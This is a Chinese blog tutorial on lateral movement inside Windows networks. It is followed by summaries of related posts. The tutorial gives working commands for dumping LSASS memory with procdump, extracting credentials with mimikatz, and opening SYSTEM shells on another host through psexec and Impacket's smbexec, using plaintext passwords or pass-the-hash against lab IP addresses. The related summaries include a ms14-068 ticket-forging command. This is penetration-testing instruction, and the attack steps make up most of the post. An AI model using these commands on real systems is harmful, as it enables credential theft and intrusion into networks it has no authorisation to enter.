横向移动-传递攻击SMB服务利用psexec&smbexec

最新推荐文章于 2024-12-31 00:15:00 发布
最新推荐文章于 2024-12-31 00:15:00 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: 横向移动 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_65096687/article/details/130903088
版权
文章讲述了在Windows2012及以上版本中,由于关闭WDigest或者安装特定补丁导致无法获取明文密码的问题。提出了几种解决方案,包括使用哈希传递技术(PTH,PTK)、利用SMB和WMI协议,以及通过注册表启用WDigestAuth。此外,还介绍了使用Procdump获取LSASS.dmp文件,结合Mimikatz破解哈希,以及利用psexec和smbexec工具进行远程执行的方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

win2012以上版本,关闭了wdigest 或者安装了 KB287199补丁。无法获取明文密码

总的来说就是win2012后无法获取明文密码

解决办法就是:

1.可以利用哈希hash传递(pth,ptk等进行移动)

2.利用其他服务协议(SMB,WMI)进行哈希hash移动

3.注册表开启wdigest Auth 进行获取明文密码

4.利用第三方工具(hashcat)进行破解获取

Procdump+Mimikatz获取明文密码(这个没用,mimikatz还是hash)

Procdump是一款win官方软件,不会被杀软杀,他的主要功能就是获取hash值。并存储在lsass.dmp文件中。那么我们把软件上传到对方主机获取到hash值后用mimikatz在我们本地进行破解。

导出lsass.dmp文件 

procdump -accepteula -ma lsass.exe lsass.dmp

 然后使用mimikaz

sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full

这个hash破解失败。因为hash本来就是不可逆的。如果密码难度过大,撞库不成功。还是不会得到明文密码。

所以接下来,就要介绍新的协议。

psexec(win自带,第三方库都有)&smbexec(只有第三方库)

利用windows上smb服务通过明文和hash传递来执行远程执行。(对方445端口开放)

我们需要Windows自带的两款自带工具。

psexec(pstools(win官方))和smbexec

psexec

这是win自带的工具包 pstools

上传到攻击机上

有两种使用方法

1.先链接IPC,在使用psexec


net use \\192.168.52.129\ipc$ P@ssw0rd /user:god\liukaifeng01

PsExec.exe \\192.168.52.129 -s cmd

PsExec.exe \\对方ip  -s cmd

用PsExec.exe 连接对方 -s 是以system 创建一个 cmd窗口

exit 退出

 

使用成功

2.不需要建立IPC连接,直接提供明文密码。

PsExec.exe \\192.168.52.129 -u 用户名 -p 密码  -s cmd

成功

 刚刚是用的明文密码

现在是建立在hash值上的连接(会报错不知道啥原因)

PsExec.exe -hashes 值  ./用户@对方IP

然后使用第三方工具包impacket

cmd使用

 

psexec.exe -hashes 值  ./用户名@对方ip

成功

如果域用户    .  改为 域名

smbexec(第三方库,impacket)

它也可以建立在明文和hash上

明文

smbexec.exe ./liukaifeng01:P@ssw0rd@192.168.52.129

如果有域,.换为域名

hash

smbexec.exe -hashes 值 ./用户名@对方ip

 成功

 

 

 

 

 

内网渗透(四十三)之横向移动-SMB远程执行命令横向移动
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-20 797
SMB 全称是 Server Message Block 翻译过来是服务器信息块,它也是一种客户端到服务器的通信协议。除此之外,SMB 协议也被称为请求-回复协议。客户端与服务器建立连接后,客户端可以向服务器发送SMB命令允许用户访问共享、打开、读取或者是写入文件。利用条件:开启了445端口。
4.14-smb远程执行命令横向移动
最新发布
qq_38122566的博客
03-18 396
SMB 全称是 Server Message Block 翻译过来是服务器信息块,它也是一种客户端到服务器的通信协议。除此之外,SMB 协议也被称为请求-回复协议。客户端与服务器建立连接后,客户端可以向服务器发送SMB命令允许用户访问共享、打开、读取或者是写入文件。利用条件:开启了445端口。
【内网安全-横向移动】基于SMB协议-PsExec
02-10 9444
横向移动-基于SMB协议】PsExec
内网安全:WMI协议与SMB协议横向移动
qq_61553520的博客
08-24 2833
此外,SMB协议还经过不断的发展和改进,最新的版本是SMB3,它引入了更高的性能和安全性特性。它是在局域网(LAN)中广泛使用的一种协议,最初由IBM开发,后来由微软引入并逐渐发展为现代的SMB协议。WMI协议的主要目标是提供一种统一的接口,使系统管理员和开发人员能够通过编程方式获取和控制Windows操作系统的各种管理信息。通过WMI协议,可以访问和操作计算机的硬件、操作系统、网络、进程、服务等各个方面的信息。SMB协议的作用是允许计算机之间共享文件和资源,并提供对这些共享资源的访问和管理。
DAY179内网渗透之内网对抗:横向移动篇&入口切换&SMB共享&WMI管道&DCOM组件&Impacket套件&CS插件
m0_74402888的博客
12-31 1542
因此在内网渗透中,我们可以使用WMI进行横向移动,支持用户名明文或者hash的方式进行认证,并且该方法不会在目标日志系统留下痕迹。SMB服务通常由文件服务器提供,它允许客户端计算机通过网络访问服务器上的共享资源。通过SMB用户可以在网络上访问和共享文件夹、文件以及打印机,从而实现在不同计算机之间方便地共享数据和打印输出。它支持不同的两台机器上的组件间的通信,不论它们是运行在局域网、广域网、还是Internet上。、WMI服务开启,端口135,默认开启。2、横向移动-协议服务-命令模式、
红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&PTH哈希&PTT票据&PTK密匙&Kerberoast攻击点&TGT&NTLM爆破
HACKONE的博客
06-23 379
请求的Kerberos服务票证的加密类型是RC4_HMAC_MD5,这意味着服务帐户的NTLM密码哈希用于加密服务票证。生成票据文件:shell ms14-068.exe -u webadmin@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1132 -d 192.168.3.21 -p admin!PTH(pass the hash) #利用的lm或ntlm的值进行的渗透测试(NTLM认证攻击
内网安全 - 域横向 smb&wmi
acepanhuan的博客
03-15 389
通过官方PSTools中psexec连接时只能用明文密码进行连接,但是不会被杀毒软件拦截通过官方自带命令WMIC时,只支持明文且没有回显需自己读取通过官方自带命令cscript与wmiexec.vbs配合时有回显,但是只支持明文通过非官方impacket-examples-windows中psexec和smbexec和wmiexec连接时可支持密文hash密码连接,但容易被杀毒软件拦截现在基本通过mimikatz获取的密码都是密文的impacket-examples-windows下载地址。
红队内网攻防渗透:内网渗透之内网对抗:横向移动篇&入口切换&SMB共享&WMI管道&DCOM组件&Impacket套件&CS插件
HACKONE的博客
06-22 661
因此在内网渗透中,我们可以使用WMI进行横向移动,支持用户名明文或者hash的方式进行认证,并且该方法不会在目标日志系统留下痕迹。SMB服务通常由文件服务器提供,它允许客户端计算机通过网络访问服务器上的共享资源。通过SMB用户可以在网络上访问和共享文件夹、文件以及打印机,从而实现在不同计算机之间方便地共享数据和打印输出。它支持不同的两台机器上的组件间的通信,不论它们是运行在局域网、广域网、还是Internet上。这里ping 3.32 是能ping通的 所以防火墙入站规则是关闭的,可以执行正向shell。
内网渗透-内网横向移动的九种方式
lza20001103的博客
08-26 2182
内网横向移动的九种方式 文章目录内网横向移动的九种方式实验环境1.IPC横向1.1 利用条件1.2 命令2.WMI横向2.1利用条件2.2wmic2.3 cscript2.4 wmiexec3.smb横向3.1 利用条件3.2 psexec(微软官方工具)3.3 psexec(impacket工具)3.4 smbexec4.密码喷洒4.1利用metasploit进行密码喷洒5.PTH-哈希传递5.1 利用条件5.2 MiMiKatz-PTH6.PTK-mimiKatZ761 利用条件7.PtT-票据传递(m
2024年内网渗透-smb&wmi_wmi渗透(1)
2401_84281648的博客
05-02 781
privilege::debug //提权sekurlsa::minidump lsass.dmp //注意lsass.exe必须与mimikatz.exe同目录#建立ipc#psexec明文传递paexec \192.168.139.131 -s cmd //-s是以system权限运行#不用先ipc连接,直接使用psexec本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。
哈希传递常用方法
路虽远,行将至。事虽难,做必达。
05-13 730
随着人们的安全意识逐渐增强,企业内的服务器弱口令也逐渐减少,密码复杂度提高,当我们获取到服务器权限后,可以提取出用户密码hash,但多数情况下显然是难以解密出明文密码。这时候就需要用到内网hash传递技术了。哈希传递利用了NTLM认证机制的缺陷,可以直接利用密码hash值来进行NTLM认证。如果目标主机与我们提取到密码hash值的机器密码相同时,便可直接使用hash值来远程登录目标主机。
SMB协议利用-PsExec使用过程介绍
村中少年的专栏
05-09 1073
本文介绍psexec的基本功能使用和原理,为后续分析psexec的SMB流量分析奠定基础
PSexec工具横向移动
Y22Lee的博客
05-28 1370
之前我们讲解了IPC,PTH,PTK,PTH,其实这些东西都是用来进行认证的IPC:使用明文的账号密码进行认证PTH:使用NTLM-hash值进行认证PTK:使用AES秘钥进行认证PTT:使用票据进行认证认证通过之后如何实现远程上线内网其他的机器,或者说远程执行其他电脑的命令呢?计划任务服务除了以上俩种方式其实还有其他的方法和工具的,接下来我就一一对齐进行介绍,并且分析原理和流量,从底层了解工具psexec工具smbexec工具WMI命令DCOM接口WinRM服务
HTB_Tactics靶机之smb使用psexec获取shell
网络安全学习
05-30 861
很简单的smb重复实践 信息收集 日常扫描,和 HTB_Dancing 靶机所涉及的服务一致,上次是讲的 smb 服务 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 连接 smb 端口,测试 root 和空密码都报错,百度后说这是因为执行 smbclient 命令的用户 ID 没.
内网渗透-横向移动】PsExec工具远程命令执行横向移动
lza20001103的博客
09-02 1831
横向移动】PsExec工具远程命令执行横向移动 文章目录【横向移动】PsExec工具远程命令执行横向移动PsExec介绍 PsExec介绍 psexec 是 windows 下非常好的一款远程命令行工具。 psexec的使用不需要对方主机开方3389端口, 只需要对方开启admin共享和ipc共享和ipc共享和ipc (该共享默认开启,依赖于445端口)。 但是,假如目标主机开启了防火墙(防火墙禁止445端口连接), psexec也是不能使用的,会提示找不到网络路径。 由于psexec是Windo
SMB攻击利用-通过psexec添加用户流量数据包分析
村中少年的专栏
05-10 257
本文通过分析已知的PsExec为远端主机添加用户的流量,分析了SMB,DCE/RPC,SVCCTL等多种协议的交互细节,为日常安全运营,护网HVV,重保过程中遇到的关于psexec的流量分析提供参考
6、内网安全-横向移动&Wmi&Smb&CrackMapExec&ProxyChains&Impacket
m0_65842464的博客
02-16 1730
在内网环境中,主机192.168.3.31有外网网卡能出网,在取得该主机权限后上线,搭建web应用构造后门下载地址,利用该主机执行相关命令可以进行横向移动,通过传递命令其他主机也可访问下载主机192.168.3.31的后门并执行,从而拿下内网中更多不出网主机。前提:用户名密码明文或哈希值抓取1、内网安全-域信息收集&CS插件&Adfind&BloodHound-优快云博客一、域横向移动-WMI-自带命令套件插件WMI是通过135端口进行利用,支持用户名明文或者hash。
横向渗透之PSExec、SMBExec和WMIExec的使用及特征
weixin_65550121的博客
12-09 3152
支持单向、双向通信。攻击者通过PSEXEC连接到远程机器并通过命名管道执行命令,命名管道是通过一个随机命名的二进制文件创建的,这个文件被写入到远程机器上的ADMIN$共享,最后通过SVCManager用来创建服务。建立连接之后,我们执行notepad.exe,可以发现它卡在这了,这因为我们在等待远程机器的输入,然而它永远不会输入。首先我们通过PSEXEC去横向的时候,这里上传了一个文件名字叫SBxFixsS.exe的文件,也就是说将这个文件写入到了远程机器的ADMIN$共享中,我们可以查看一下共享目录。
内网对抗-横向移动篇&入口差异&切换上线&IPC管道&AT&SC任务&Impacket套件&UI插件
01-28
在内网渗透测试过程中,横向移动是指攻击者通过已有的访问权限,在网络内部扩展控制范围的行为。这一过程涉及多种技术和方法,旨在绕过防护措施并获得更广泛的系统访问权。 #### 不同的入口差异 当被控机器位于域...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值